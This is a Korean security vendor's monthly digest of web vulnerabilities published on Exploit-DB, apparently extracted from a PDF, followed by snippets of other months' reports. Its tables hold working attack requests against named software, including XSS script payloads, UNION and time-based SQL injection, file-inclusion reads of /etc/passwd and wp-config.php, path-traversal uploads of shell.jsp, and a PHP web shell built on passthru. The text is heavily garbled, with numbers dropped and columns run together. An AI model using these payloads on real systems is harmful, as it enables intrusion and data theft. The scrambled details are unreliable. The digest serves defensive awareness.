EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun
|
|
- 기영 근
- 7 years ago
- Views:
Transcription
1 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross Site Scripting 공격들은난이도측면에서단순한공격들임에도불구고특정소프트웨어에서다수의취약점이발견되었습니다. 해당소프트웨어를사용는관리자는업데이트를실시여 Cross Site Scripting 공격에노출되지않도록각별한주의가필요합니다, 이번달에는특히 Local File Inclusion 공격에대한취약점이많이보고되었습니다. 해당취약점들은위험도가매우높은취약점들로, 공격이성공할시서버의계정정보는물론다른중요한파일들까지노출될수있어치명적인피해를초래할수있습니다. 해당서버의관리자는사용자입력값을엄격게검증여 Local File Inlcusion 공격을차단할필요가있습니다. 주요소프트웨어취약점발생현황을보면 에서가장많은취약점이보고되었으며다음으로,, Zen Cart 순이였습니다. 앞의두개의소프트웨어는흔히사용는 CMS 이며뒤의두개는전자거래오픈솔루션으로써널리이용되고있는소프트웨어입니다. 네개모두사용률이높은소프트웨어로써자신의소프트웨어가해당소프트웨어중의나라면취약점에대비할수있도록주기적인취약점보안패치실시가반드시필요합니다.. 취약점별보고개수취약점 보고개수 XSS 8 SQL Injection 4 LFI 8 4 File Upload 총합계 취약점별보고개수 XSS SQL Injection LFI 8 4 File Upload. 위험도별분류 위험도 보고개수 백분율 % 중 % % 합계 % 8 위험도별분류 7 중 3. 공격난이도별현황공격난이도 보고개수 백분율 % 중.% % 총합계 % 공격난이도별현황 4 중 주요소프트웨어별취약점발생현황소프트웨어이름 Zen Cart ManageEngine Desktop vbulletin MyBB PHP Stock Management System LoadedCommerce Mpay4 phpmyfaq Atmail LittleSite webedition Restaurant Script (PizzaInn Project) Glype Cart Engine OsClass 총합계 보고개수 주요소프트웨어별취약점발생현황 9 Zen Cart ManageEngine Desktop vbulletin MyBB PHP Stock Management System LoadedCommerce Mpay4 phpmyfaq Atmail LittleSite webedition 5 Restaurant Script (PizzaInn Project) Glype Cart Engine ** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 3454 File Upload Slideshow Gallery Plugin.4. - admin.php File Upload 취약점 345 Mulitple Themes - admin-ajax.php 취약점 3454 SQL Injection Huge-IT Image Gallery.0. - admin.php SQL
2 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_counter.php SQL LFI Acento Theme - view-pdf.php LFI 취약점 SQL Injection 중 WP Support Plus Responsive Ticket System.0 Plugin - admin-ajax.php SQL LFI WP Support Plus Responsive Ticket System.0 Plugin - downloadattachment.php SQL 3478 SQL Injection All In One WP Security Plugin admin.php SQL 347 XSS 중 Login Widget With Shortcode 3..- options-general.php XSS 취약점 3457 SQL Injection Spider Calendar <= index.php SQL 345 SQL Injection Spider Contacts.3. - index.php SQL 3437 SQL Injection Spider Form Maker <= index.php SQL LFI Mac Gallery.5 - index.php LFI 취약점 SQL Injection Face Gallery.0 - index.php SQL LFI Face Gallery.0 - index.php LFI 취약점 3458 XSS 중 - mail.php XSS 취약점 3458 XSS 중 - newsletters.php XSS 취약점 3458 XSS 중 - banner_manager.php XSS 취약점 3458 XSS 중 - countries.php XSS 취약점 3458 XSS 중 - currencies.php XSS 취약점 3458 XSS 중 - languages.php XSS 취약점 3458 XSS 중 Zen Cart media_types.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart media_manager.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart music_genre.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart record_company.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart record_artists.php XSS 취약점 Zen Cart
3 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 POST /posnic-.0/update_details.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ PHP Stock Management System PHP Stock PHP Stock XSS 중.0 - update_details.php XSS 취 Management Management 약점 System System.0 sname=%3cscript%3ealert%8%9%3b%3c%fscript%3e &address=ghala+mandi&place=old+road&city=multan&pi n=&phone=033570&website= com& =umar%40gmail.com&submit=update POST /statusupdate?actiontocall=lfu&customerid=337&filena me=../../../../../../shell.jsp&configdataid= HTTP/ ManageEngine Desktop - /statusupdate 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ ManageEngin e Desktop ManageEngine Desktop POST /mdm/mdmloguploader?filename=..\\..\\..\webapps\\ Desktop\\shell.jsp HTTP/ ManageEngine Desktop - /mdmloguploader 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ ManageEngin e Desktop ManageEngine Desktop POST /agentloguploader?computername=whatever&domainna me=whatever&customerid=337&filename=..\\..\\..\\..\\webapps\\desktop\\shell.jsp HTTP/ ManageEngine Desktop - /agentloguploader 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ ManageEngin e Desktop ManageEngine Desktop POST slides&method=save HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows File Upload Slideshow Gallery Plugin.4. - admin.php File Upload 취약점 dd009908f Slideshow Gallery Plugin dd009908f filename="backdoor.php" <?php passthru($_get['cmd']);?> dd009908f Mulitple Themes - admin-ajax.php 취약점 /wp-admin/adminajax.php?action=revslider_show_image&img=../wpconfig.php SQL Injection Huge-IT Image Gallery.0. - admin.php SQL /wordpress/wpadmin/admin.php?page=gallerys_huge_it_gallery&task=edit _cat&id=&removeslide=%0and%0= Huge-IT Image Gallery.0.
4 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW SQL Injection AppleWebKit/535.7 KHTML, like Gecko Chrome/ vbulletin 4.0.x vbulletin 4.0.x vbulletin search.php SQL post_id%3d%0and%0%3d%up_type%3dlike POST /mybb/usercp.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ XSS 중 MyBB User Social Networks Plugin. - usercp.php XSS 취약점 my_post_key=a3baa4af a448dda4b&bday =&bday=&bday3=&birthdayprivacy=all&website=http% MyBB MyBB User Social Networks Plugin. 3A%F%F&profile_fields%5Bfid3%5D=Undisclosed&profile _fields%5bfid%5d=&profile_fields%5bfid%5d=&icq=&ai m=&msn=&yahoo=%3e%3cscript%3ealert%8document.c ookie%9%3c%fscript%3e%3c&away=0&awayreason=& awayday=&awaymonth=&awayyear=&action=do_profile&r egsubmit=update+profile POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/ SQL Injection Like Dislike Counter..3 Plugin - ajax_counter.php SQL User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Like Dislike Counter..3 Plugin post_id%3d%0and%0%3d%up_type%3dlike POST /register/ HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd009908f dd009908f SQL Injection LoadedCommerce7 - /register/ SQL Content-Disposition: form-data; name="field_" :entry_lastname, LoadedComm erce LoadedComm erce dd009908f Content-Disposition: form-data; name="field_",(select user_name from lc_administrators order by id asc limit ),(select user_password from lc_administrators order by id asc limit ),3,4,5,,7,8,9,0)# dd009908f filename="" SQL Injection Mpay4 PrestaShop Payment Module.5 - confirm.php SQL /modules/mpay4/confirm.php?mpaytid=&status=bbb &TID=a%7%0or%0%7a%7%0in%0%8select%0IF %8SUBSTR%8@@version,,%9=5,BENCHMARK% ,SHA%80xDEADBEEF%9%9,%0false%9%9;% 0--%3 Mpay4 Mpay4 PrestaShop Payment Module.5 /catalog/admin/mail.php?action=preview HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ XSS 중 - mail.php XSS 취약점 customers_ _address=<script>alert()</script>&fro m=fuck@shit.up&subject=test&message=test
5 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 /catalog/admin/newsletters.php?action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW XSS 중 AppleWebKit/535.7 KHTML, like Gecko Chrome/ newsletters.php XSS 취약점 module=newsletter&title=<script>alert(3)</script>&cont ent=<script>alert(45)</script> /catalog/admin/banner_manager.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows XSS 중 dd009908f - banner_manager.php XSS 취약점 dd009908f Content-Disposition: form-data; name="banners_title" <script>alert();</script> dd009908f filename="info.gif" <?php passthru($_get['cmd']);?> dd009908f-- /catalog/admin/countries.php?page=&action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW XSS 중 - countries.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/ countries_name=aaa<script>alert()</script> /catalog/admin/currencies.php?page=&action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW XSS 중 - currencies.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/ title=<script>alert()</script> /catalog/admin/languages.php?action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW XSS 중 - languages.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/ name=<script>alert()</script>
6 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /create-content/gallery HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd009908f XSS 중 vbulletin 5..X - /gallery XSS 취약점 dd009908f vbulletin vbulletin 5..X Content-Disposition: form-data; name="title_3" cool" onmouseover=alert() xssed=" dd009908f filename="" dd009908f-- GET /phpmyfaq/index.php HTTP/ XSS 중 phpmyfaq.8.x - index.php XSS 취약점 User-Agent: <script>alert()</script> Referer: <script>alert(3)</script> phpmyfaq phpmyfaq.8.x SQL Injection Spider Calendar <= index.php SQL Injection 취약점 /joomla/index.php?option=com_spidercalendar&calendar_i d=%0and%0=-- Spider Calendar <= 3.. POST /zen/zen-cart-v /admin3/media_types.php?page=&mid=&ac tion=save HTTP/ XSS 중 Zen Cart media_types.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="type_name" <script>alert()</script> dd009908f POST /zen/zen-cart-v /admin3/media_types.php?page=&mid=&ac tion=save HTTP/ XSS 중 Zen Cart media_manager.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="media_name" <script>alert()</script> dd009908f
7 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /zen/zen-cart-v /admin3/music_genre.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows XSS 중 Zen Cart music_genre.php XSS 취약점 Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="music_genre_name" <script>alert()</script> dd009908f POST /zen/zen-cart-v /admin3/record_company.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows XSS 중 Zen Cart record_company.php XSS 취약점 Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="record_company_name" <script>alert()</script> dd009908f POST /zen/zen-cart-v /admin3/record_artists.php?action=insert HTTP/ XSS 중 Zen Cart record_artists.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="artists_name" <script>alert()</script> dd009908f LFI Acento Theme - view-pdf.php LFI 취약점 /wp-content/themes/acento/includes/viewpdf.php?download=&file=/etc/passwd Acento Theme POST /mail/index.php/mail/mail/listfoldermessages/searching/tru e/selectfolder/inbox./resultcontext/searchresultstab HTTP/ XSS 중 Atmail Webmail 7. - /mail/index.php/mail/mail/listfol dermessages/searching/true/sel ectfolder/inbox./resultcont ext/searchresultstab XSS 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Atmail Atmail Webmail 7. searchquery=&goback=&from=&to=&subject=&body= &filter=<script>alert()</script> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW SQL Injection 중 WP Support Plus Responsive Ticket System.0 Plugin - admin-ajax.php SQL AppleWebKit/535.7 KHTML, like Gecko Chrome/ WP Support Plus Responsive Ticket System.0 Plugin action=openticket&ticket_id=- UNION SELECT concat_ws(0x3a,version(),database(),user()),,3,4,5,,7 * any registered user can successfully execute this request
8 EDB 분석보고서 (04.09) SQL Injection Spider Contacts.3. - index.php SQL /joomla/index.php?option=com_spidercontacts&contact_i d=%0and%0=&view=showcontact&lang=ca Spider Contacts SQL Injection Spider Form Maker <= index.php SQL /index.php?option=com_formmaker&view=formmaker&id =%0and%0= Spider Form Maker <= SQL Injection SelectSurvey.net - ReviewReadOnlySurvey.aspx SQL /survey/reviewreadonlysurvey.aspx?responseid=<num>& SurveyID=%0and%0= SelectSurvey.n et SQL Injection SelectSurvey.net - UploadImagePopupToDb.aspx SQL /survey/uploadimagepopuptodb.aspx?responseid=<num >&SurveyID=%0and%0= SelectSurvey.n et LFI LFI XSS 중 LFI SQL Injection LFI LFI SQL Injection LittleSite 0. - index.php LFI 취약 /littlesite/index.php?file=../../../../etc/passwd LittleSite LittleSite 0. 점 webedition webedition /webedition/showtempfile.php?file=../../../../etc/passwd webedition showtempfile.php LFI 취약점 Restaurant Script(PizzaInn Project) - register-exec.php XSS 취약점 Mac Gallery.5 - index.php LFI 취약점 Face Gallery.0 - index.php SQL Face Gallery.0 - index.php LFI 취약점 Glype browse.php LFI 취 약점 All In One WP Security Plugin admin.php SQL /PizzaInn/register-exec.php? fname=<script>alert()</script>&lname=<script>alert()</s cript>&login=<script>alert()</script>&password=r00t&cpa ssword=r00t&question=8&answer=hack4&submit=registe r /index.php?option=com_macgallery&view=download&alb umid=../../etc/passwd /index.php?option=com_facegallery&view=images&aid= %0and%0=&lang=en /index.php?option=com_facegallery&task=imagedownloa d&img_name=../../etc/passwd GET /browse.php?u=&b=8 HTTP/. Cookie: s=../security ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WP Support Plus WP Support Responsive Ticket System.0 /wp-content/plugins/wp-support-plus-responsive-ticketsystem/includes/admin/downloadattachment.php?path=/et Plus LFI Plugin - Responsive downloadattachment.php SQL c/passwd Ticket System.0 Plugin /wpadmin/admin.php?page=aiowpsec&tab=tab&order=,% 8select%0load_file%8CONCAT%8CHAR%89%9, CHAR%89%9,%8select%0version%8%9%9,C HAR%84%9,CHAR%897%9,CHAR%8%9,C HAR%8%9,CHAR%897%9,CHAR%899%9,C HAR%807%9,CHAR%80%9,CHAR%84% 9,CHAR%84%9,CHAR%899%9,CHAR%8% 9,CHAR%809%9,CHAR%89%9,CHAR%80% 9,CHAR%8%9,CHAR%8%9,CHAR%898 %9,CHAR%897%9,CHAR%84%9%9%9% 9 POST /zen/zen-cart-v /admin3/media_types.php?page=&mid=&ac tion=save HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd009908f Restaurant Script (PizzaInn Project) Restaurant Script (PizzaInn Project) Mac Gallery.5 Face Gallery.0 Face Gallery.0 Glype Glype.4.9 All In One WP Security Plugin SQL Injection Cart Engine cart.php SQL dd009908f Content-Disposition: form-data; name="item_id[0]" Cart Engine Cart Engine 3.0 8' AND (SELECT FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,floor(rand()*))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql dd009908f filename="" LFI OsClass index.php LFI 취약점 /osclass/ocadmin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd OsClass OsClass 3.4.
9 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 XSS 중 Login Widget With Shortcode 3..- optionsgeneral.php XSS 취약점 POST /wp-admin/optionsgeneral.php?page=login_widget_afo HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Login Widget With Shortcode 3.. custom_style_afo=</textarea><script>alert()</script >
** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More informationEDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.
More information76 XSS 하 Huge-IT Slider admin.php XSS
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.
More informationEDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj
EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은
More informationEDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu
EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다.
More information36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 4 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 대부분의 공격이 CMS 에서발견되습니다. CMS 에서는
More informationEDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C
EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 3 월에공개된 Exploit-DB 의분석결과, Local File Inclusion 공격에대한보고개수가가장많았습니다. Local File Inclusion
More informationEDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL
EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 월에공개된 Exploit-DB 의분석결과, 지난 월의분석결과와동일하게 SQL Injection 과 Coss Site Scipting(XSS) 공격에대한보고개수가가장많았습니다.
More informationEDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06 년 7 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았으며공격패턴도다양하게발견되었습니다.
More information날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약
EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가다른취약점과비교하여유난히많았습니다. 세계적으로가장많이사용되고있는
More informationEDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P
EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 208 년 월 EDB 분석보고서에공개된취약점은모두 50 개입니다. 이가장많은수의취약점이공개된공격은 SQL Injection 입니다. 특히공격난이도와위험도가모두
More informationEDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. Cross Site Scripting
More informationEDB 분석보고서 (05.08) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.
EDB 분석보고서 (05.08) 05.08.0~05.08. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 8 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 분석된 공격들은주로특정웹어플리케이션의구조적인특성상발생하는들이거나구현이쉬운공격들이대부분이었습니다.
More informationPOST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 207 년 0 월 Exploit-DB 에공개된은총 67 개입니다. 그중 SQL Injection 공격은총 5 개로가장많은수를차지했습니다. 이달의위험도가가장높은공격은 Command Injection 공격이었습니다. Command Injection 공격은의도하지않은시스템명령어를실행시킬수있는공격으로, 이번달공개된공격은주로
More information3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 5 월에공개된 Exploit-DB 의분석결과, XSS (Cross Site Scripting) 공격에대한보고개수가가장많았습니다. 분석된
More informationEDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한보고개수가가장많았으며공격유형도다양하게발견되었습니다. SQL Injection
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More informationÆí¶÷4-¼Ö·ç¼Çc03ÖÁ¾š
솔루션 2006 454 2006 455 2006 456 2006 457 2006 458 2006 459 2006 460 솔루션 2006 462 2006 463 2006 464 2006 465 2006 466 솔루션 2006 468 2006 469 2006 470 2006 471 2006 472 2006 473 2006 474 2006 475 2006 476
More informationMicrosoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc
분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More information품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]
품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ] 2014. 10. 목 차 I. Stack 통합테스트개요 1 1. 목적 1 II. 테스트대상소개 2 1. The Bug Genie 소개 2 2. The Bug Genie 주요기능 3 3. The Bug Genie 시스템요구사항및주의사항 5 III. Stack 통합테스트 7 1. 테스트환경
More informationMicrosoft Word - junior.docx
Black Falcon Team 첫번째입팀과제보고서 - Damm Vulnerable Web Application - Name : 박영근 Intro Lesson 1 : Brute Force 4 Lesson 2 : Command Execution 9 Lesson 3 : CSRF. 10 Lesson 4 : Insecure CAPTCHA 13 Lesson 5 : File
More information105È£4fš
의 자선단체들이 사랑과 자비를 베푼 덕택에 국제 사회에서 훠모사가 존경받는 위치에 섰으며 국가간 에 상호우애를 다지는 데 큰 기여를 했다고 치하했 다. 칭하이 무상사 국제협회는 구호물자를 터키 지 터키 지진 피해자들을 위한 구호물자 전달식 진 피해자들에게 전달하는데 협조해 준 중국 항공의 훠모사 항공화물 센터 매니저인 제임스 류 씨, 골든 파운데이션 여행사의
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More information1 01 [ 01-02 ] 01. 02. 9 01 01 02 02 [ 01-05 ] 01. 02. 03. 04. 05. 10 plus 002
1 01 [ 01-02 ] 01. 02. 9 01 01 02 02 [ 01-05 ] 01. 02. 03. 04. 05. 10 plus 002 01 01 02 02 03 04 03 04 003 05 05 [ 06-10 ] 06. 07. 08. 09. 10. 11 plus 004 06 06 07 07 08 08 09 09 10 10 005 [ 11-15 ] 11.
More information문서 템플릿
HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver. 0.01 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재,
More information<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>
